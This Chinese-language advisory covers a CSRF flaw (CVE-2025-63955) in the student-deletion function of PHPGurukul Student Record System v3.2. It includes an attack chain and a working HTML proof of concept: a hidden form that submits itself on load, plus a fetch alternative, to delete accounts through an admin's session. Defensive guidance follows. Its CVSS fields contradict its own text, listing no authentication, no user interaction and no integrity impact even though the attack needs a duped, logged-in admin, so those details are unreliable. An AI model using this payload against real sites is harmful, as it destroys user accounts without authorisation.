CVE-2025-63955 PHPGurukul学生记录系统CSRF漏洞导致未授权账户删除

漏洞信息

漏洞编号

CVE-2025-63955

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Student Record System v3.2

漏洞概述

CVE-2025-63955是PHPGurukul学生记录系统v3.2中的一个跨站请求伪造（CSRF）漏洞，位于manage-students.php组件中。该漏洞允许攻击者通过社会工程学手段，诱骗已认证的管理员用户在不知情的情况下提交恶意请求。由于系统未对删除学生账户的操作实施有效的CSRF令牌验证，攻击者可以构造恶意的HTTP请求，诱导管理员执行未授权的账户删除操作。此漏洞的成功利用将导致学生用户账户被非法删除，造成服务拒绝（DoS）效果，影响系统的正常功能和用户体验。攻击者无需具备任何预先认证即可发起此类攻击，仅需诱骗管理员访问恶意链接或页面即可。该漏洞的CVSS评分为7.5，属于高危级别，对系统的机密性、完整性和可用性均构成威胁。

技术细节

该CSRF漏洞存在于PHPGurukul学生记录系统的manage-students.php文件中，具体涉及学生账户删除功能。漏洞的根本原因在于系统对关键操作缺少CSRF令牌验证机制。攻击者可以创建一个包含恶意表单的网页，当已登录的管理员访问该页面时，浏览器将自动向目标系统发送删除学生账户的POST请求。由于浏览器在发送请求时会自动携带目标网站的会话Cookie，服务器会认为这是来自合法管理员的请求，从而执行删除操作。攻击者需要获取有效管理员账户ID或通过其他方式确定目标用户标识符，然后构造包含account_id参数的删除请求。该漏洞影响系统的完整性（I:N）和可用性（A:H），攻击者可以通过批量删除用户账户来完全破坏系统的可用性，造成大规模拒绝服务。修复方案需要在所有状态变更操作中实施CSRF令牌验证，包括使用随机生成的token并在服务器端进行验证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为PHPGurukul学生记录系统v3.2，并确定manage-students.php中的删除功能端点

STEP 2

步骤2: 构造恶意页面

攻击者创建一个包含自动提交表单的恶意HTML页面，表单指向目标系统的删除功能接口

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、即时消息或其他方式诱骗已登录的管理员用户访问恶意页面

STEP 4

步骤4: 自动执行请求

当管理员访问恶意页面时，浏览器自动发送带有有效会话Cookie的POST请求到目标系统

STEP 5

步骤5: 账户删除

目标服务器收到请求后，由于缺少CSRF验证，将请求视为合法操作，执行账户删除

STEP 6

步骤6: DoS效果达成

目标学生账户被成功删除，用户无法访问系统资源，造成服务拒绝效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-63955 - Delete Student Account -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC</title>
</head>
<body>
    <h1>CSRF PoC - CVE-2025-63955</h1>
    <p>This PoC demonstrates the CSRF vulnerability in PHPGurukul Student Record System v3.2</p>
    
    <form id="csrfForm" action="http://target-site/manage-students.php" method="POST" style="display:none;">
        <!-- Delete action parameter -->
        <input type="hidden" name="action" value="delete">
        <!-- Target student account ID to delete -->
        <input type="hidden" name="account_id" value="123">
        <!-- CSRF token - MISSING in vulnerable version -->
        <!-- <input type="hidden" name="csrf_token" value="VALID_TOKEN"> -->
    </form>

    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        
        // Alternative: Use fetch API for more control
        /*
        fetch('http://target-site/manage-students.php', {
            method: 'POST',
            mode: 'no-cors',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: 'action=delete&account_id=123'
        });
        */
    </script>
    
    <p>If successful, the target student account will be deleted.</p>
</body>
</html>

影响范围

PHPGurukul Student Record System v3.2

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1）临时禁用学生账户删除功能；2）增加删除操作的二次确认机制；3）限制管理员会话时长，减少攻击窗口期；4）监控异常删除操作日志；5）对管理员进行安全意识培训，提高对社会工程学攻击的警惕性。建议管理员在处理来自不可信来源的链接时先退出登录状态。